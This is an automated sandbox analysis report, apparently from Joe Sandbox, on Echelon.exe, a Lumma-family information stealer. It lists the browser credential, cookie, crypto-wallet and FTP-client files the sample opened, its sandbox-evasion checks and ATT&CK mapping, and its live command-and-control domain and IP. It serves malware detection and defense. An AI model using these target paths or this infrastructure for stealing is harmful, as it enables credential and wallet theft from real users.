              Source: Echelon.exe, 00000000.00000002.2321403698.00000000015F8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWE
              Source: Echelon.exe, 00000000.00000003.2188683219.00000000044AE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
              Source: Echelon.exe, 00000000.00000003.2188683219.00000000044AE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696428655x
              Source: Echelon.exe, 00000000.00000003.2188683219.00000000044AE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
              Source: Echelon.exe, 00000000.00000003.2188683219.00000000044AE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
              Source: C:\Users\user\Desktop\Echelon.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
              Source: Echelon.exe, 00000000.00000003.2277367726.000000000164F000.00000004.00000020.00020000.00000000.sdmp, Echelon.exe, 00000000.00000003.2277367726.000000000163D000.00000004.00000020.00020000.00000000.sdmp, Echelon.exe, 00000000.00000002.2321403698.000000000164F000.00000004.00000020.00020000.00000000.sdmp, Echelon.exe, 00000000.00000003.2317978549.000000000164F000.00000004.00000020.00020000.00000000.sdmp, Echelon.exe, 00000000.00000002.2321403698.00000000015F8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
              Source: C:\Users\user\Desktop\Echelon.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

              Stealing of Sensitive Information

              Source: Yara matchFile source: Process Memory Space: Echelon.exe PID: 3356, type: MEMORYSTR
              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
              Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
              Source: Echelon.exe, 00000000.00000003.2277367726.000000000164F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Electrum\wallets
              Source: Echelon.exe, 00000000.00000003.2277367726.000000000164F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\ElectronCash\wallets
              Source: Echelon.exe, 00000000.00000003.2277367726.000000000164F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Jaxx Liberty
              Source: Echelon.exe, 00000000.00000003.2277367726.000000000164F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Exodus\exodus.wallet
              Source: Echelon.exe, 00000000.00000003.2250780193.0000000001669000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
              Source: Echelon.exe, 00000000.00000003.2250780193.0000000001669000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: keystore
              Source: C:\Users\user\Desktop\Echelon.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cert9.dbJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqliteJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\formhistory.sqliteJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
Source: C:\Users\user\Desktop\Echelon.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.js
Source: C:\Users\user\Desktop\Echelon.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\logins.json
Source: C:\Users\user\Desktop\Echelon.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
Source: C:\Users\user\Desktop\Echelon.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite
Source: C:\Users\user\Desktop\Echelon.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.db
Source: C:\Users\user\Desktop\Echelon.exe | File opened: C:\Users\user\AppData\Roaming\FTPbox
Source: C:\Users\user\Desktop\Echelon.exe | File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites
Source: C:\Users\user\Desktop\Echelon.exe | File opened: C:\Users\user\AppData\Roaming\FTPGetter
Source: C:\Users\user\Desktop\Echelon.exe | File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla
Source: C:\Users\user\Desktop\Echelon.exe | File opened: C:\Users\user\AppData\Roaming\FTPInfo
Source: C:\Users\user\Desktop\Echelon.exe | File opened: C:\ProgramData\SiteDesigner\3D-FTP
Source: C:\Users\user\Desktop\Echelon.exe | File opened: C:\Users\user\AppData\Roaming\FTPRush
Source: C:\Users\user\Desktop\Echelon.exe | File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\Desktop\Echelon.exe | File opened: C:\Users\user\AppData\Roaming\Ledger Live
Source: C:\Users\user\Desktop\Echelon.exe | File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
Source: C:\Users\user\Desktop\Echelon.exe | File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\Desktop\Echelon.exe | File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
Source: C:\Users\user\Desktop\Echelon.exe | File opened: C:\Users\user\AppData\Roaming\Binance
Source: C:\Users\user\Desktop\Echelon.exe | File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
Source: C:\Users\user\Desktop\Echelon.exe | File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
Source: C:\Users\user\Desktop\Echelon.exe | File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
Source: C:\Users\user\Desktop\Echelon.exe | File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
Source: C:\Users\user\Desktop\Echelon.exe | Directory queried: C:\Users\user\Documents\EEGWXUHVUG
Source: C:\Users\user\Desktop\Echelon.exe | Directory queried: C:\Users\user\Documents\EFOYFBOLXA
Source: C:\Users\user\Desktop\Echelon.exe | Directory queried: C:\Users\user\Documents\GLTYDMDUST
Source: C:\Users\user\Desktop\Echelon.exe | Directory queried: C:\Users\user\Documents\NVWZAPQSQL
Source: C:\Users\user\Desktop\Echelon.exe | Directory queried: C:\Users\user\Documents\QCOILOQIKC
Source: Yara match | File source: 00000000.00000003.2250780193.0000000001669000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: Echelon.exe PID: 3356, type: MEMORYSTR

              Remote Access Functionality

Source: Yara match | File source: Process Memory Space: Echelon.exe PID: 3356, type: MEMORYSTR
Source: Yara match | File source: sslproxydump.pcap, type: PCAP
Source: Yara match | File source: decrypted.memstr, type: MEMORYSTR
Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media
Execution: 2 Windows Management Instrumentation; 2 Command and Scripting Interpreter; At; Cron; Launchd; Scheduled Task
Persistence: 1 DLL Side-Loading; Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
Privilege Escalation: 1 DLL Side-Loading; Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
Defense Evasion: 11 Virtualization/Sandbox Evasion; 1 DLL Side-Loading; Obfuscated Files or Information; Binary Padding; Software Packing; Steganography
Credential Access: 2 OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials
Discovery: 1 Query Registry; 121 Security Software Discovery; 11 Virtualization/Sandbox Evasion; 1 Process Discovery; 1 File and Directory Discovery; 22 System Information Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC
Collection: 41 Data from Local System; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture
Command and Control: 1 Encrypted Channel; 2 Non-Application Layer Protocol; 113 Application Layer Protocol; Protocol Impersonation; Fallback Channels; Multiband Communication
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop
Source | Detection | Scanner | Label
Echelon.exe | 58% | Virustotal |
Echelon.exe | 50% | ReversingLabs | Win32.Spyware.Lummastealer

No Antivirus matches

Name | IP | Active | Malicious | Antivirus Detection | Reputation
erectystickj.click | 172.67.154.166 | true | true |  | unknown

Name | Malicious | Antivirus Detection | Reputation
dare-curbys.biz | false |  | high
impend-differ.biz | false |  | high
covery-mover.biz | false |  | high
https://erectystickj.click/api | true |  | unknown
dwell-exclaim.biz | false |  | high
erectystickj.click | true |  | unknown
zinc-sneark.biz | false |  | high
formy-spill.biz | false |  | high
se-blurry.biz | false |  | high
print-vexer.biz | false |  | high

IP | Domain | Country | ASN | ASN Name | Malicious
172.67.154.166 | erectystickj.click | United States | 13335 | CLOUDFLARENETUS | true

                                                                                  Joe Sandbox version:41.0.0 Charoite
                                                                                  Analysis ID:1579580
                                                                                  Start date and time:2024-12-23 02:28:11 +01:00
                                                                                  Joe Sandbox product:CloudBasic
                                                                                  Overall analysis duration:0h 6m 15s
                                                                                  Hypervisor based Inspection enabled:false
                                                                                  Report type:full
                                                                                  Cookbook file name:default.jbs
                                                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                  Number of analysed new started processes analysed:4
                                                                                  Number of new started drivers analysed:0
                                                                                  Number of existing processes analysed:0
                                                                                  Number of existing drivers analysed:0
                                                                                  Number of injected processes analysed:0
                                                                                  Technologies:
                                                                                  • HCA enabled
                                                                                  • EGA enabled
                                                                                  • AMSI enabled
                                                                                  Analysis Mode:default
                                                                                  Analysis stop reason:Timeout
                                                                                  Sample name:Echelon.exe
                                                                                  Detection:MAL
                                                                                  Classification:mal100.troj.spyw.evad.winEXE@1/0@1/1
                                                                                  EGA Information:Failed
                                                                                  HCA Information:
                                                                                  • Successful, ratio: 100%
                                                                                  • Number of executed functions: 0
                                                                                  • Number of non-executed functions: 0
                                                                                  Cookbook Comments:
                                                                                  • Found application associated with file extension: .exe
                                                                                  • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                                  • Excluded IPs from analysis (whitelisted): 172.202.163.200, 13.107.246.63
                                                                                  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Time | Type | Description
20:29:11 | API Interceptor | 8x Sleep call for process: Echelon.exe modified
Match: 172.67.154.166
Associated Sample Name / URL | Detection | Threat Name | Context
Millich Law.pdf | malicious | HTMLPhisher |
https://docs-paymentreceipts.info | malicious | HtmlDropper, HTMLPhisher |
                                                                                      No context
Match: CLOUDFLARENETUS
Associated Sample Name / URL | Detection | Threat Name | Context
Neverlose.cc.exe | malicious | LummaC | 172.67.157.254
setup.msi | malicious | Unknown | 104.21.65.145
bas.exe | malicious | LummaC | 104.21.71.155
Wine.exe | malicious | LummaC | 104.21.50.161
tg.exe | malicious | Babadeda | 172.67.74.152
Launcher_x64.exe | malicious | LummaC | 172.67.157.254
tg.exe | malicious | Babadeda | 104.26.12.205
setup.exe | malicious | Babadeda | 104.26.13.205
AmsterdamCryptoLTD.exe | malicious | LummaC, DarkComet, LummaC Stealer, Vidar | 104.21.80.1
WonderHack.exe | malicious | LummaC | 104.21.66.86
Match: a0e9f5d64349fb13191bc781f81f42e1
Associated Sample Name / URL | Detection | Threat Name | Context
Neverlose.cc.exe | malicious | LummaC | 172.67.154.166
bas.exe | malicious | LummaC | 172.67.154.166
Wine.exe | malicious | LummaC | 172.67.154.166
Launcher_x64.exe | malicious | LummaC | 172.67.154.166
AmsterdamCryptoLTD.exe | malicious | LummaC, DarkComet, LummaC Stealer, Vidar | 172.67.154.166
WonderHack.exe | malicious | LummaC | 172.67.154.166
external.exe | malicious | LummaC | 172.67.154.166
Launcher.exe | malicious | LummaC | 172.67.154.166
Wave-Executor.exe | malicious | LummaC | 172.67.154.166
Setup.exe | malicious | LummaC | 172.67.154.166
                                                                                      No context
                                                                                      No created / dropped files found
                                                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                      Entropy (8bit):6.935156866043373
                                                                                      TrID:
                                                                                      • Win32 Executable (generic) a (10002005/4) 98.39%
                                                                                      • Windows ActiveX control (116523/4) 1.15%
                                                                                      • InstallShield setup (43055/19) 0.42%
                                                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                      • DOS Executable Generic (2002/1) 0.02%
                                                                                      File name:Echelon.exe
                                                                                      File size:6'689'112 bytes
                                                                                      MD5:cbdef49d32cf66bfa4c8a86d225b11bd
                                                                                      SHA1:bc2ce52834c6a615a8bd5d3b6aafd25239d03b44
                                                                                      SHA256:4e6c7876342928a4ca103e27e2a0823c0e8df2457ba32e5d62fcf94cb111a477
                                                                                      SHA512:84c6a436250dc12c2055c75abd318c07408c314388ac3c3209d22985955cb2d1cc9e916f29fb10d9257cb3d995a72cf91be83258e3151b6a0eda36125b831adb
                                                                                      SSDEEP:196608:YkywgD6ytCV8NxxKQP8v0ojDIg9Cbk/V8e:pyp621P8vXDd
                                                                                      TLSH:56666D756E7981E2F48A0170DAAA393F9469CC28373920D7D6D71A28F5F06E1C435E2F
                                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........M..b...b...b.......b..B....b..B....b..B..N.b...c...b.......b.......b..B....b..B....b..B....b.Rich..b.........PE..L....H.T...
                                                                                      Icon Hash:133171d6ccccc244
                                                                                      Entrypoint:0x576f94
                                                                                      Entrypoint Section:.text
                                                                                      Digitally signed:true
                                                                                      Imagebase:0x400000
                                                                                      Subsystem:windows gui
                                                                                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                      Time Stamp:0x54834815 [Sat Dec 6 18:16:53 2014 UTC]
                                                                                      TLS Callbacks:
                                                                                      CLR (.Net) Version:
                                                                                      OS Version Major:5
                                                                                      OS Version Minor:1
                                                                                      File Version Major:5
                                                                                      File Version Minor:1
                                                                                      Subsystem Version Major:5
                                                                                      Subsystem Version Minor:1
                                                                                      Import Hash:72ac408540f41dba76edd212bbe5c62f
                                                                                      Signature Valid:false
                                                                                      Signature Issuer:CN=GlobalSign GCC R45 EV CodeSigning CA 2020, O=GlobalSign nv-sa, C=BE
                                                                                      Signature Validation Error:The digital signature of the object did not verify
                                                                                      Error Number:-2146869232
                                                                                      Not Before, Not After
                                                                                      • 16/10/2024 03:05:06 17/10/2026 03:05:06
                                                                                      Subject Chain
                                                                                      • E=info@remoteutilities.com, CN=REMOTE UTILITIES PTE. LTD., O=REMOTE UTILITIES PTE. LTD., L=Singapore, S=Singapore, C=SG, OID.1.3.6.1.4.1.311.60.2.1.3=SG, SERIALNUMBER=202431257D, OID.2.5.4.15=Private Organization
                                                                                      Version:3
                                                                                      Thumbprint MD5:EA9E05EDB1D06F8328320FE2B652C61F
                                                                                      Thumbprint SHA-1:902CC2BB628B651954A5F7A1D68C6CDE84707A54
                                                                                      Thumbprint SHA-256:695F7336E0350F311E1C4B8BA978EBEB2617C21980B9A66CDF94BEDC9574F6BC
                                                                                      Serial:1B17B4C6100E7FD4156C5F01
                                                                                      Programming Language:
                                                                                      • [C++] VS2008 SP1 build 30729
                                                                                      • [ASM] VS2010 SP1 build 40219
                                                                                      • [ C ] VS2010 SP1 build 40219
                                                                                      • [C++] VS2010 SP1 build 40219
                                                                                      • [IMP] VS2008 SP1 build 30729
                                                                                      • [ C ] VS2008 SP1 build 30729
                                                                                      • [RES] VS2010 SP1 build 40219
                                                                                      • [LNK] VS2010 SP1 build 40219
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x4322d4 | 0x168 | .rdata
